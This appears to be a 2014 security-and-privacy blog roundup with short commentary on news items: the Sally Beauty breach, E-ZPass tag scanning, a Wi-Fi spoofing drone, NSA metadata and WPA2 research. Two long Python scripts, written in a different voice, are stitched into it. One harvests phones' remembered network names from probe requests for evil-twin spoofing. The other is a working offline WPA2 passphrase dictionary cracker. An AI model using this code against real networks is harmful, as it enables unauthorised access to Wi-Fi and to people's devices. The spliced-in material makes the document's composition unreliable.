Very interesting
graphic of the military downsizing after the fall of the Soviet
Union. Let's hope all those nukes went back to Russia or were
dismantled.
Ukraine Battles to Rebuild a Depleted Military
As the Kremlin began
its invasion of the Ukrainian peninsula of Crimea last month, a
days-old government in Kiev turned to its military to stem the tide.
There was an immediate problem: No car batteries for the military
vehicles.
With coffers empty,
Ukraine's fledgling government appealed to the U.S. embassy for help.
The embassy said it would take weeks to get assistance, so the
government had to search—among its own people—to find a regional
oligarch, Ihor Kolomoisky, to kick in the funds to buy them locally.
I am coming to the
conclusion that it IS smart to deliberately understate the size of a
breach in the early releases of information. Apparently, when you
get around to correcting (admitting) the numbers, no one in the media
truly cares.
ZIP Codes Show Extent of Sally Beauty Breach
Earlier this month,
beauty products chain Sally Beauty acknowledged
that a hacker break-in compromised fewer than 25,000 customer credit
and debit cards. My previous
reporting indicated that the true size of the breach was at least
ten times larger. The analysis published in this post suggests that
the Sally Beauty breach may have impacted virtually all 2,600+ Sally
Beauty locations nationwide.
… I asked Sally
Beauty to comment on my findings. They declined again to offer any
more detail on the breach, issuing the following statement:
“As
experience has shown in prior data security incidents at other
companies, it is difficult to ascertain with certainty the scope of a
data security incident prior to the completion of a comprehensive
forensic investigation. As a result, we will not speculate as to the
scope or nature of the data security incident. Please check
sallybeautyholdings.com
for updates.”
[Note
that they do not say that they haven't already completed their
investigation. Bob]
The zip code analysis
is available in this
.csv spreadsheet.
I ask you, how would
Christie know when to close lanes onto the bridge without this?
Cindy Weightman
I’m
driving around Bergen County. That sound you’re hearing is a
device that alerts you any time your E-ZPass tag is scanned. The
problem is that it’s going off like crazy and there isn’t a toll
booth in sight. The device was created by a man who is protective of
his privacy, but still wanted an alias that makes a splash. His
cover name is Puking
Monkey. Our ride takes us on the feeder roads surrounding the
George Washington Bridge including Routes 46 and 4 in Fort Lee and up
the northbound side of the Palisades Parkway and all the while this
detector keeps going off, even though during that entire time, we
didn’t go near a single toll booth.
Read more on WBGO.
It's simple. Just put
FBI “Stingray” technology in a drone. Why didn't the FBI think
of that? (Of course they did.)
… London-based
Sensepoint security researchers have developed a drone called
'Snoopy' that can intercept data from your Smartphones
using spoofed wireless networks, CNN
Money reported.
The Drone will search
for WiFi enabled devices and then using its built-in technology, it
will see what networks the phones have accessed in the past and
pretends to be one of those old network connections.
Spoofing WiFi networks
that device has already accessed allows Snoopy Drone to connect with
targeted Smartphone without authentication or interaction. In
technical terms, The Drone will use 'Wireless Evil Twin Attack'
to hack Smartphones.
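The article does not say how Snoopy learns which networks a phone "has accessed in the past". The standard leak is the client's own directed probe requests: a phone looking for a remembered network broadcasts management frames that carry that network's SSID in the clear, and an evil twin only has to answer with the same name. The parser below is an added example, not code from the Sensepoint researchers or from the CNN Money article; it pulls the SSID element out of raw 802.11 probe request frames and builds the per-client list an attacker would impersonate. The frames, MAC addresses and SSIDs are constructed for the example, and the frame builder assumes no radiotap header in front of the 802.11 header.

```python
import struct

# 802.11 management frame: frame control (2), duration (2), addr1/addr2/addr3 (6 each),
# sequence control (2) = 24 byte header, followed by information elements (ID, length, data).
MGMT_HDR_LEN = 24
SUBTYPE_PROBE_REQ = 4
SUBTYPE_BEACON = 8
EID_SSID = 0


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_probe_request(frame):
    """Return (client MAC, [SSIDs]) for a probe request, or None for any other frame."""
    if len(frame) < MGMT_HDR_LEN:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3       # bits 2-3: 0 = management
    subtype = (fc0 >> 4) & 0xF     # bits 4-7: 4 = probe request
    if ftype != 0 or subtype != SUBTYPE_PROBE_REQ:
        return None
    client = frame[10:16]          # addr2 = transmitter (the probing station)
    ssids = []
    pos = MGMT_HDR_LEN
    while pos + 2 <= len(frame):
        eid, elen = frame[pos], frame[pos + 1]
        data = frame[pos + 2:pos + 2 + elen]
        if len(data) < elen:
            break                  # truncated element: stop rather than misparse
        # A zero-length SSID element is a wildcard probe and names no network.
        if eid == EID_SSID and elen > 0:
            ssids.append(data.decode("utf-8", "replace"))
        pos += 2 + elen
    return mac_str(client), ssids


def harvest_preferred_networks(frames):
    """Map client MAC -> set of SSIDs it asked for, i.e. its remembered networks."""
    pnl = {}
    for frame in frames:
        parsed = parse_probe_request(frame)
        if parsed is None:
            continue
        mac, ssids = parsed
        pnl.setdefault(mac, set()).update(ssids)
    return pnl


def build_mgmt_frame(subtype, sa, ssid):
    """Constructed test frame: management header + SSID element + a supported-rates element."""
    fc = bytes([(subtype << 4) & 0xF0, 0x00])
    broadcast = b"\xff" * 6
    hdr = fc + b"\x00\x00" + broadcast + sa + broadcast + b"\x00\x00"
    ies = bytes([EID_SSID, len(ssid)]) + ssid.encode() + bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])
    return hdr + ies


def sample_frames():
    """Constructed capture: two probing phones, one wildcard probe, one AP beacon to ignore."""
    phone_a = bytes.fromhex("aabbcc000001")
    phone_b = bytes.fromhex("aabbcc000002")
    ap = bytes.fromhex("deadbeef0000")
    return [
        build_mgmt_frame(SUBTYPE_PROBE_REQ, phone_a, "CoffeeShopWifi"),
        build_mgmt_frame(SUBTYPE_PROBE_REQ, phone_a, "HomeNet-5G"),
        build_mgmt_frame(SUBTYPE_PROBE_REQ, phone_a, ""),        # wildcard, names nothing
        build_mgmt_frame(SUBTYPE_PROBE_REQ, phone_b, "CorpGuest"),
        build_mgmt_frame(SUBTYPE_BEACON, ap, "NotAClient"),     # beacon, not a client
    ]


if __name__ == "__main__":
    for mac, ssids in sorted(harvest_preferred_networks(sample_frames()).items()):
        print(mac, "would answer an evil twin named any of:", sorted(ssids))
```

Every SSID in that map is one the client will join "without authentication or interaction" if the spoofed network is open, which is why an open-network entry in a phone's remembered list is the dangerous one; a remembered WPA2 network cannot be impersonated this way without the passphrase.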
Perhaps I see this
differently. It is easy to ignore communication that does not
originate or terminate at specific locations, or involve specific
individuals (or countries). All you need is the guts to face the
possibility that the next terrorist act would have been easily
prevented if you had been monitoring that communications link.
The New York Times
report
that President Obama will call for an end to the bulk collection
of American’s telephone metadata is yet further vindication for
Edward Snowden in particular, and for transparency more generally.
The only reason the President is proposing this change is because,
once the program became public, it was unsustainable in its current
form.
(Related) Will we lose
this ability?
Ellen Nakashima reports:
Federal
agents notified more than 3,000 U.S. companies last year that their
computer systems had been hacked, White House officials have told
industry executives, marking the first time the
government has revealed how often it tipped off the private sector to
cyberintrusions.
The
alerts went to firms large and small, from local banks to major
defense contractors to national retailers such as Target, which
suffered a breach last fall that led to the theft of tens of millions
of Americans’ credit card and personal data, according to
government and industry officials.
Read more on the Washington Post.
It would be nice to
know how many of those 3,000 cases involved breaches of personal
information databases as opposed to trade secrets or intellectual
property, but it’s good that the government is sharing what it has
learned with targeted entities.
[From
the article:
The number reflects
only a fraction of the true
scale of cyberintrusions into the private sector by criminal
groups and foreign governments and their proxies, particularly in
China and Eastern Europe.
While some companies
are encouraging BYOD, others are requiring employees to stop any
personal use of their equipment. (My wife tells me I must buy her a
cellphone and a computer.)
UK – Bring your own device (BYOD)
by Sabrina I. Pacifici on March 24, 2014
Bring
your own device guidance: “Bring your own device is a term
which refers to when employees use their personal computing devices
(typically smart phones and tablets) in the workplace. Permitting
devices which you do not have sufficient control over to connect to
the corporate IT systems can introduce a range of security
vulnerabilities and other data protection concerns if not correctly
managed. This guidance explores what you need to consider if
permitting the use of personal devices to process personal data for
which you are responsible.”
My favorite scofflaw.
(He's hardly a “fugitive” unless that means something different
in New Zealandese.) Think I might buy a few shares...
Cyber fugitive Dotcom mocks authorities: 'From 0 into a $210m company'
Kim Dotcom, one of the world's most wanted cyber fugitives, on
Tuesday gloated over a deal that will see a cloud storage firm he
founded while on bail listing on the New Zealand stock exchange and
valued on paper at NZ$210 million ($179 million).
The flashy internet mogul, who also goes by the name Kim Schmitz, is
fighting a bid by U.S. authorities to extradite him from his lavish
estate in New Zealand to face online piracy charges over the now
closed file sharing site Megaupload.
… New Zealand company records show Mega Ltd's shareholders
include Dotcom's wife, through a trust, with a 26 percent stake.
Dotcom is not listed as a shareholder nor a director, but on the Mega
website he is called principal strategist.
(Related) Why are New
Zealand and Australia overreacting so easily?
Doubts over computer hacker case
Matthew Flannery, 24,
of Point Clare, was allegedly an international hacking group leader
when he was arrested while at work at a Sydney IT security firm last
April and charged with computer crime offences carrying jail terms of
up to 10 years.
But in Woy Woy Local
Court this month magistrate Derek Lee was told Mr Flannery expected
to apply in May to have all charges against him withdrawn and
dismissed.
The application will
come after the Commonwealth Office of the Director of Public
Prosecutions over the past year has downgraded the case from the
District Court to the Local Court, modified the charges, sought six
adjournments and agreed to vary Mr Flannery’s bail so that he was
not required to report to police three times a week.
For my students to get
the most out of their technology training...
Tech Videos — Best Of The Best YouTube Technology Channels
New technology, be it
gadgets, computers or broader innovations, can be difficult to
understand. Fortunately, there are a number of YouTube channels that
help you get a grasp on the latest and greatest. These sources
provide news, reviews and in-depth look at what’s shaping the
future. Here are ten must-watch channels every geek should subscribe
to.
For my Computer
Security (and Ethical Hacking) students. What's better than a Free
WiFi site? A “Make Any WiFi Site Free” tool!
Researchers Outline How to Crack WPA2 Security
Published
in the International Journal of Information and Computer Security,
the research outlines how the Wi-Fi Protected Access 2 (WPA2)
protocol can be potentially exposed using deauthentication and brute
force attacks.
"Thus
far, WPA2 is considered to be amongst the most secure protocols,"
according to the researchers'
paper. "However it has several security vulnerabilities.
Until now there has not been a complete and fully successful
methodology capable of exposing the WPA2 security. This paper
provides a novel way of successfully exposing WPA2 security issues by
using a complete dictionary that generates all the possible printable
ASCII characters of all possible lengths."
… "At
the beginning, the area was scanned-sniffed with ‘Airodump’ and
then a deauthentication attack was made with ‘Aireplay’,"
according to the paper. "Through that, an instance of the PSK
was caught. Finally, ‘Aircrack’ was attempting to reveal the
secret password by using the instance of the PSK and matching it with
every record of the dictionary. For these experiments we
used a very big [Please!
This would fit easily on a small thumb drive. Bob]
dictionary that consisted of 666,696 standard printable ASCII
character records of various lengths. ‘Airodump’ and ‘Aireplay’
are commands of the ‘Aircrack’ suite, responsible for sniffing
and deauthentication respectively." [Aircrack
is a free wifi network Auditing tool. Bob]
In
all but one of the cases, the key was easily found, the researchers
stated.
… The
best way to protect an 802.11i network is through the use of WPA2 in
combination with MAC filtering, the researchers recommend. In
addition, changing the encryption key periodically can increase the
level of difficulty for attackers. The more complex the password,
the more the difficulty will rise as well.
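What the paper describes is the ordinary offline attack on WPA2-PSK: the deauthentication forces the client to reconnect, the sniffer captures the four-way handshake, and the cracker derives a key from each dictionary word and checks it against the MIC in the captured handshake. The script below is an added example of that last step, not code from the paper or from the Aircrack suite. It uses only the key schedule defined in 802.11i (PBKDF2-HMAC-SHA1 with 4096 iterations to the PMK, the PRF to the PTK, HMAC-SHA1 truncated to 128 bits for the EAPOL MIC of a WPA2/CCMP network); the SSID, passphrase, MAC addresses, nonces and the handshake message 2 frame are constructed so that it runs offline. It also counts the printable-ASCII keyspace, which puts the "complete dictionary" of 666,696 records in perspective: eight-character passphrases alone number 95^8.

```python
import hashlib
import hmac
import struct

# Constructed lab values (not from the paper): one WPA2-PSK network and one client.
SSID = "BobsLab"
PASSPHRASE = "letmein123"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(0, 32))     # sent by the AP in EAPOL message 1
SNONCE = bytes(range(32, 64))    # sent by the client in EAPOL message 2

# EAPOL-Key layout: 4-byte 802.1X header, then descriptor type (1), key info (2),
# key length (2), replay counter (8), nonce (32), IV (16), RSC (8), key ID (8),
# MIC (16), key data length (2), key data.
NONCE_OFF = 4 + 1 + 2 + 2 + 8            # 17
MIC_OFF = NONCE_OFF + 32 + 16 + 8 + 8    # 81


def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 over the two MACs and two nonces gives the PTK; its first 16 bytes are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:16]


def eapol_mic(kck, eapol):
    """WPA2 (RSN, AES-CCMP): HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFF] + bytes(16) + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck, snonce):
    """Constructed handshake message 2 (client -> AP); key info 0x010A = pairwise, MIC, HMAC-SHA1 version."""
    body = (struct.pack(">BHHQ", 0x02, 0x010A, 0, 1) + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0))
    frame = struct.pack(">BBH", 1, 3, len(body)) + body    # version 1, type EAPOL-Key
    return frame[:MIC_OFF] + eapol_mic(kck, frame) + frame[MIC_OFF + 16:]


def captured_msg2():
    """Stand-in for the message 2 airodump would record after aireplay forces a reconnect."""
    kck = kck_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_msg2(kck, SNONCE)


def crack_psk(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """Offline dictionary attack: recompute message 2's MIC for each candidate passphrase."""
    snonce = msg2[NONCE_OFF:NONCE_OFF + 32]
    target = msg2[MIC_OFF:MIC_OFF + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:     # WPA2 passphrases are 8 to 63 characters
            continue
        kck = kck_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return candidate
    return None


def printable_ascii_keyspace(min_len=8, max_len=63):
    """Number of passphrases over the 95 printable ASCII characters in a length range."""
    return sum(95 ** n for n in range(min_len, max_len + 1))


if __name__ == "__main__":
    msg2 = captured_msg2()
    words = ["password", "12345678", "letmein123", "correcthorse"]
    print("recovered passphrase:", crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, msg2, words))
    print("eight-character printable-ASCII passphrases:", printable_ascii_keyspace(8, 8))
```

The cost of each guess is dominated by the 4096 PBKDF2 iterations, and that is the only thing standing between a captured handshake and the passphrase: the attack is entirely offline, so changing the key periodically or filtering MAC addresses (a client's MAC is visible in the same capture) does nothing for a passphrase that is in the attacker's wordlist. Passphrase length and randomness are what move the attacker from a 666,696-line dictionary to a search of 95^8 and beyond.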
Apparently there is a
market (audience) for anything.
Watch Jerry Seinfeld’s Web Series: Comedians In Cars Getting Coffee [Stuff to Watch]
American comedian Jerry
Seinfeld is probably best known for the sitcom that shares his
surname, but his latest venture takes the form of a free
online web series. Titled Comedians
In Cars Getting Coffee, the show involves Jerry Seinfeld driving
famous comedians around in classic sports cars, before stopping for a
cup of coffee.
The brilliance lies in
the simplicity of the format which not
only celebrates comedy, but classic cars and the ability
to talk at length about virtually nothing at all. The show is now in
its third season, with a total of 23 episodes online for your
perusal.